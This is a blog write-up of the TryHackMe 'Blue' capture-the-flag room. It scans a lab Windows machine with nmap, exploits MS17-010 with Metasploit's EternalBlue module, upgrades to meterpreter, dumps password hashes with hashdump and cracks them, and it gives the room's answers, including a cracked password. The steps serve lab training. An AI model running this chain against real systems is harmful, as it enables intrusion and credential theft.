TryHackMe : Blue

tryhackme Blue write-up

  • Name: Blue
  • Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
  • Room: tryhackme.com

[Task 1] Recon

Scan the machine

First we need to scan the machine to check for available ports and services

sudo nmap -sS -A <machine_ip>

Question: How many ports are open with a port number under 1000?

Answer: 3

Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08–067)

“We can check the security problems of a device using scripts in Nmap, for example vuln script can identify common problems”

nmap <machine_ip> — script vuln

The machine seems to be vulnerable to the ms17–010 exploit

Answer: ms17–010

[Task 2] Gain Access

Start Metasploit

We know that the machine has a security problem and we can use Metasploit to exploit it

msfconsole

The next step is to find the appropriate exploit for the security problem (ms17–010)

search ms17–010

The exploit we want is the second option

Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Answer: exploit/windows/smb/ms17_010_eternalblue

We have to select the desired exploit and set the required values

use exploit/windows/smb/ms17_010_eternalblue

and

show options

Set the Machine IP

set RHOSTS <machine_ip>

Question: Show options and set the one required value. What is the name of this value? (All caps for submission)

Answer: RHOSTS

Run the exploit

run or exploit

You can see now that our exploit was executed and that we got a Windows host shell. In order to continue, we must use the Meterpreter shell to execute commands and upload files.

[Task 3] Escalate

We need to turn the shell into a meterpreter

background

and

use post/manage/shell_to_meterpreter

use post/manage/shell_to_meterpreter or use shell_to_meterpreter

Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Answer: post/multi/manage/shell_to_meterpreter

List the sessions and set the session number.

sessions -l

and

set SESSION 1

Question: Select this (use MODULE_PATH). Show options, what option are we required to change?

Answer: SESSION

Now if we see the sessions again, a session meterpreter has been added

sessions -l

sessions 2

We got the meterpreter shell so now we can interactive shell to the attacker from which to explore the target machine and execute code.

Use ps command to list all the process that is running in the host system.

ps

[Task 4] Cracking

Use hashdump to dump the user credentials

hashdump

Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Answer: Jon

https://crackstation.net/

Use the above link to crack the password hash or else you could crack the hash using hashcat or John with rockyou.txt.

Question: Copy this password hash to a file and research how to crack it. What is the cracked password?

Answer: alqfna22

[Task 5] Find flags!

search the flags using :

search -f flag*.txt

thank you 🌏🔥

--

--

--

Computer student and interested in programming and security

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Browser-based supercomputers: the evil and the good

Best “WhatsApp” alternate Apps to choose.

{UPDATE} 頭のたいそう -脳を鍛える簡単パズルゲーム- Hack Free Resources Generator

Hedging Strategy EA — Forex Robot “Swing” (MT4 Semiautomated expert advisor, Trade panel EA)

Wi-Fi Hacking using Evil Twin Attacks and Captive Portals! — Part 4

How to keep your NFT Safe?

Protecting citizen’s data in a deglobalized world

How I Avoided Getting Hacked: The Importance of Information Security in the Digital Age

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Hassan Mohammadi

Hassan Mohammadi

Computer student and interested in programming and security

More from Medium

Crackme Challenge: PleaseCrackMe

Boosting Cyber Resilience

Madness TryHackMe — Writeup (Detailed)

picoCTF: Wireshark twoo twooo two twoo…